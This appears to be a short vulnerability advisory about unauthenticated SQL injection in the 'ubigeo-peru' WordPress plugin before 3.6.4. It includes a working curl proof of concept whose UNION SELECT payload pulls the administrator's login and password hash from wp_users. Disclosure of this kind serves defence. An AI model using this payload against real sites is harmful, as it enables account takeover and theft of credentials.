The plugin does not properly sanitise and escape some parameters before using them in SQL statements via various AJAX actions, some of which are available to unauthenticated users, leading to SQL Injections
curl https://example.com/wp-admin/admin-ajax.php \ --data βaction=rt_ubigeo_load_distritos_address&idProv;=1 UNION SELECT 1,(SELECT user_login FROM wp_users WHERE ID = 1),(SELECT user_pass FROM wp_users WHERE ID = 1) from wp_users#β
CPE | Name | Operator | Version |
---|---|---|---|
ubigeo-peru | lt | 3.6.4 |